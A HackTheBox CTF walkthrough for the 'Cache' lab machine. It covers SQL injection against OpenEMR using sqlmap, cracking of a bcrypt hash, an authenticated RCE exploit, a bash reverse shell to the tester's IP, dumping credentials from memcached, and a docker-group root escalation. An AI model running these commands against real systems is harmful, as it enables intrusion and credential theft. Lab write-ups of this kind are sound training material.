Cache HackTheBox Walkthrough

Cache HackTheBox walkthrough featured image

This is the Cache HackTheBox walkthrough. In it I demonstrate, step by step, how I rooted the Cache HackTheBox machine. Cache is a Linux machine with IP address 10.10.10.188, rated medium difficulty by its maker. Let’s begin. Connect your machine to the VPN and confirm connectivity by pinging the IP 10.10.10.188.

I started by scanning the IP 10.10.10.188 to get a starting point. Nmap [a popular port scanner] gave the following result.

Scanning

$nmap -sV -sC -oA scan 10.10.10.188

Cache HackTheBox nmap scan result

Nmap revealed that ports 22, 80, and 30000 are open, running SSH, Apache web server, and Memcached [a general-purpose distributed memory-caching system] respectively. At http://10.10.10.188/author.html I found the name ash and added it to my notes, as it may be a user on the box. Nothing else of interest turned up, so I tried directory brute forcing.

Directory brute forcing

$dirsearch -u 10.10.10.188 -e all -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20

Cache HackTheBox directory bruteforcing in walkthrough

Directory brute forcing revealed two folders, javascript and jquery.

Accessing http://10.10.10.188/javascript/ gives access denied.

Javascript Access Denied Page

And http://10.10.10.188/jquery/functionality.js revealed:

Cache HackTheBox walkthrough: ash credential file

From the above file I got the credential ash: H@v3_fun

Used the credential at http://10.10.10.188/login.html. After logging in I found nothing interesting except an image of a magician.

Cache Hackthebox Magician image

Tried to create a custom wordlist using cewl.

Custom Wordlist Create

$cewl -w custom_wordlist.txt -d 10 -m 1 http://10.10.10.188/author.html

Custom wordlist creation using cewl in cache hackthebox walkthrough

Used wfuzz to fuzz for virtual host names with the custom wordlist we just created.

Fuzzing For domain

$ wfuzz -w custom_wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.188/ --hc 400 --hh 8193

Fuzzing the Domain with custom wordlist through WFUZZ

Got a 302 response for the word HMS. Added hms.htb to my /etc/hosts file, because if virtual hosting is enabled we may get something more to enumerate.

Hosts file before modification

My local computer host file before modification

Hosts file after modification

My local computer host file after modification

Going to http://hms.htb I found that it is running OpenEMR [medical practice management software which also supports electronic medical records], and it redirected me to the login page http://hms.htb/interface/login/login.php?site=default. Tried to log in with the default credential admin: pass, but could not.

Tip: During CTF hunting and penetration testing, whenever you come across popular software or a web app, always try logging in with its default credentials, because administrators sometimes forget to change them.

Once I find known software, my next step is to identify its version so that I can look for public exploits. After a lot of enumeration I could not find the version directly. The footer of the login page at http://hms.htb/interface/login/login.php?site=default shows outdated copyright information.

Login page of OpenERM software in Cache HackTheBox Walkthrough

So I am guessing that this software was last updated in 2018, and a public exploit from before 2018 may work on it. From the release history it appears the current version is 5.0.1 or lower.

OpenEMR Software Release History

As soon as I have the software name and its version, my next step is to find the available public exploits.

Searching Public Exploit

$searchsploit openemr 5.0.1

Searching available exploit for OpenEMR software in cache hackthebox walkthrough using searchsploit

Searchsploit shows there is an authenticated RCE, so we need a username and password for the OpenEMR software to get remote code execution. After some googling I found this document on the OpenEMR website, https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf, which reveals that OpenEMR 5.0.1 has multiple vulnerabilities, SQL injection among them.

According to the PDF there is a GET-based SQL injection vulnerability at http://hms.htb/portal/add_edit_event_user.php?eid=1. I recommend reading the PDF to learn more.

OpenEMR software SQL injection error on add_edit_event_user.php file in cache Hackthebox walkthrough

Dump username and password

Capture the request in a file named request.txt using Burp Suite.

Captured request from burpsuite in file request.txt  Cache HackTheBox walkthrough

$sqlmap -r request.txt --dbs --batch

Sqlmap banner while starting
Cache hackTheBox Database Enumeration using Sqlmap in Walkthrough

$sqlmap -r request.txt -D openemr --tables

Cache hackTheBox Table Enumeration  from databse openemr using Sqlmap in Walkthrough

$sqlmap -r request.txt -D openemr -T users_secure --dump

Dumping Username and Password from users_secure table in Cache HackTheBox Walkthrough

Got the credential

openemr_admin : $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.

from the openemr database. Identifying the hash showed that it is a bcrypt hash.

Checking the type of hash on tunnelsup.com
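As an added example (not from the original post), a small Python script that identifies the dumped hash by its modular-crypt prefix and parses the bcrypt fields. The cost of 05 (32 key-expansion rounds) is far below current guidance, which is why an offline crack of this hash finishes quickly. Only the hash value comes from the page; the prefix table, regex and threshold are assumptions.

```python
import re

# The hash dumped from the users_secure table, as it appears on the page.
DUMPED_HASH = "$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B."

# Modular-crypt prefixes a CTF player meets most often (assumed table).
PREFIXES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
            "$5$": "sha256crypt", "$6$": "sha512crypt"}

# bcrypt layout: $<variant>$<cost>$<22-char salt><31-char digest>, 60 chars in total.
BCRYPT_RE = re.compile(r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")

def identify_hash(h):
    """Name the hash scheme from its modular-crypt prefix ('unknown' if none matches)."""
    for prefix, name in PREFIXES.items():
        if h.startswith(prefix):
            return name
    return "unknown"

def parse_bcrypt(h):
    """Split a bcrypt hash into its fields, or return None if it is not well-formed."""
    m = BCRYPT_RE.match(h)
    if not m:
        return None
    variant, cost, salt, digest = m.groups()
    cost = int(cost)
    return {
        "variant": variant,
        "cost": cost,
        "iterations": 2 ** cost,  # key-expansion rounds repeated for every password guess
        "salt": salt,
        "digest": digest,
        "weak_cost": cost < 10,   # OWASP recommends a bcrypt work factor of 10 or more
    }
```

A copy of the hash missing its final character (59 chars) is rejected by parse_bcrypt, which is a useful sanity check before feeding a hash to any cracking tool.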

Cracked the hash using the Debcrypt tool.

$git clone https://github.com/BREAKTEAM/Debcrypt.git

$cd Debcrypt/

$python3 crack.py

HASH: $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.

Cracking bcrypt hash using Debcrypt tool in Cache HackTheBox

So the credential is openemr_admin: xxxxxx [six lowercase x's]

Tip: Always prefer a tool built for the specific job over a general-purpose one; it improves efficiency and accuracy. For example, to crack the bcrypt hash I used Debcrypt, a tool dedicated to cracking bcrypt hashes, rather than Hashcat or John the Ripper.

We already know that an authenticated RCE exploit exists for the OpenEMR software. Let’s use it by mirroring it to our PC from the exploit-db database.

Mirror exploit

$searchsploit openemr 5.0.1

$searchsploit -m exploits/php/webapps/45161.py

$mv 45161.py openemr_rce.py

Searching Public Available Exploit for OpenEMR software Using Searchsploit

Getting Shell

$nc -nvlp 1234 // In separate window

$python openemr_rce.py http://hms.htb -u openemr_admin -p xxxxxx -c '/bin/bash -i >& /dev/tcp/10.10.14.44/1234 0>&1'

Getting User Shell on Cache HackTHeBox

Upgrade the shell to a fully functional Linux shell.

Shell Upgrade

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm-256color

Upgrading the shell to fully functional linux shell in Cache HackTheBox

Found two users, ash and luffy, in the /home/ directory. Easily switched to user ash with $su ash, entering the credential captured from http://10.10.10.188/jquery/functionality.js, i.e., H@v3_fun

$su ash

Password: H@v3_fun

Switching to user Ash in Cache HackTheBox Walkthrough

Grab User Flag

$cat /home/ash/user.txt

Cache HackTheBox user Flag

PRIVILEGE ESCALATION

Tried running $sudo -l to check whether ash has any special permissions, but got an error because user ash is not in the sudoers file.

Checking special permission given to ash user

linpeas.sh [a post-exploitation enumeration script] revealed that user luffy is a member of the docker group.

Enumerating Groups UID using linpeas in Cache HTB machine

After googling docker privilege escalation I found these two interesting articles: this and this. But the problem is that docker can only be run by user luffy, since luffy is in the docker group, and we can’t switch to luffy with $su luffy because we don’t have the credentials. So we need luffy’s password. Wait, we have a memcached server running on port 30000.

After googling penetration testing on memcached servers I found this article. Followed the steps discussed in the article and got the credentials of luffy. Remember that all these steps need to be done on the remote Cache machine.

$netstat -alnop revealed that the memcached server is listening on port 11211 locally, so we have to connect to it with telnet to get some information.

Checking Listening ports on Cache HackTheBox machine using Netstat

$telnet 127.0.0.1 11211

~version

telneting to memcached server to enumerate Credentials

~stats

Stats of Memcached server

~stats slab

Getting Stats of Slabs form Memcached Server

~stats items

Getting Stats of items from memcache server

~stats cachedump 1 0

dumping cache in memcache server on Cache HackTheBox machine

~get user

~get passwd

Getting user and Password from Memcache server

So the credential is luffy: 0n3_p1ec3. Exited telnet and switched to user luffy.
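The enumeration above, as an added Python audit script (not part of the original post) that drives the same memcached text-protocol commands (stats items, then stats cachedump per populated slab) and flags cached keys whose names suggest credentials, which is the check an administrator would run against their own cache. The responses are constructed so it runs offline; the host, port and key-name pattern are assumptions.

```python
import re
import socket

# Constructed responses standing in for a live server (not captured from the box).
FAKE_RESPONSES = {
    "stats items": "STAT items:1:number 2\r\nSTAT items:1:age 17\r\nEND\r\n",
    "stats cachedump 1 0": ("ITEM user [5 b; 0 s]\r\nITEM passwd [9 b; 0 s]\r\n"
                            "ITEM cart_42 [64 b; 0 s]\r\nEND\r\n"),
}
SENSITIVE = re.compile(r"user|login|pass|pwd|secret|token|cred", re.I)  # keys hinting at secrets

def fake_sendrecv(cmd):  # offline transport: answer from the constructed responses
    return FAKE_RESPONSES.get(cmd, "END\r\n")

def socket_sendrecv(host="127.0.0.1", port=11211, timeout=3):
    """Live transport: one TCP round trip per 'stats ...' command (replies end with END)."""
    def sendrecv(cmd):
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall((cmd + "\r\n").encode())
            buf = b""
            while not buf.endswith(b"END\r\n"):
                chunk = s.recv(4096)
                if not chunk:
                    break
                buf += chunk
        return buf.decode(errors="replace")
    return sendrecv

def slab_ids(stats_items):
    """Slab ids that currently hold items, parsed from 'stats items' output."""
    ids = set()
    for line in stats_items.splitlines():
        m = re.match(r"STAT items:(\d+):number (\d+)", line)
        if m and int(m.group(2)) > 0:
            ids.add(int(m.group(1)))
    return sorted(ids)

def cachedump_keys(dump):
    """(key, size_in_bytes) pairs parsed from 'stats cachedump <slab> 0' output."""
    return [(m.group(1), int(m.group(2)))
            for m in (re.match(r"ITEM (\S+) \[(\d+) b; (\d+) s\]", l)
                      for l in dump.splitlines()) if m]

def audit(sendrecv):
    """Walk every populated slab and return key names that look like secrets."""
    flagged = []
    for slab in slab_ids(sendrecv("stats items")):
        for key, _size in cachedump_keys(sendrecv(f"stats cachedump {slab} 0")):
            if SENSITIVE.search(key):
                flagged.append(key)
    return flagged
```

Calling audit(socket_sendrecv()) on the box itself would perform the same walk against the real listener on 127.0.0.1:11211; note that cachedump lists at most the keys memcached is willing to enumerate per slab, so an empty result is not proof that nothing sensitive is cached.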

$su luffy

Password: 0n3_p1ec3

switching to luffy user using the credential just discovered

Getting Root

Lastly run

$docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh

to get root.

Cache HackTheBox Privilege Escalation

Capture Root Flag

$cat /root/root.txt

Cache HackTheBox Root Flag

This is how I rooted the Cache machine. I learnt a lot during this challenge and hope you have also learnt something new. If you run into any issue, feel free to comment. For suggestions, please write to us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec consultant by day and a bug bounty hunter & CTF player by night. I sometimes write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/